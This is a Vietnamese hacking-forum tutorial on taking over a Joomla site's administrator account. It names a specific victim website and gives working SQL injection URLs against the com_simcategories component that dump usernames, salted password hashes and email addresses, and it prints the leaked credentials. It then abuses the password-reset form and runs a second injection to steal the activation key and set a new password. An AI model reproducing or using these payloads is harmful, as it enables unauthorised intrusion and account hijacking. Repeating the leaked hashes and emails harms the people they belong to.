[TUT] Hướng dẫn đăng nhập Joomla khi bạn đã lấy được thông tin từ SQL Injection

Đầu tiên, tất nhiên là SQL Injection rồi. Để cho dễ, tớ xài vul trong com_simcategories (Xem bài:[Joomla] Com_simcategories dính lỗi sqli)

OK, giả sử victim là thằng này:
http://dienthoainamanh.com/index.php?option=com_simcategories&view=simcategories&id=4
Giờ thì chèn SQL injection thôi
http://dienthoainamanh.com/index.php?option=com_simcategories&view=simprovider&id=-1′%20UNION%20SELECT%201,group_concat(username,0x7c,password,0x7c,email),3,4,5,6,7%20from%20jos_users–%20-
Ta có gì nào:
asuamin|053550db385f39b7d78ab931a85631df:I95zJo2Sx2kR2PElEhIlWVZsWZm98ZQ7|vanhuyenpc@gmail.com,namanh|7ecb6c26dc2422ab825817bf7d97d923:eT6gDqPs6c6rDcOHT9CVNK4wfzQoVGQp|dienthoai.namanh@gmail.com
Password và salt kiểu này crack tới mãn kiếp quá :’( 053550db385f39b7d78ab931a85631df:I95zJo2Sx2kR2PElEhIlWVZsWZm98ZQ7
Giỡn thôi, giờ thì tìm trang reset password nha
http://dienthoainamanh.com/index.php?option=com_user&view=reset
Điền vào email ở trên: vanhuyenpc@gmail.com và nhấn nút
Xong, lại tiếp tục sql injection. Mục đích là lấy activation key
http://dienthoainamanh.com/index.php?option=com_simcategories&view=simprovider&id=-1′%20UNION%20SELECT%201,group_concat(username,0x7c,activation,0x7c,email),3,4,5,6,7%20from%20jos_users–%20-
Điền cái activation vào khung => OK => nhập password mới và làm gì tiếp theo thì….xin hẹn bài sau ^^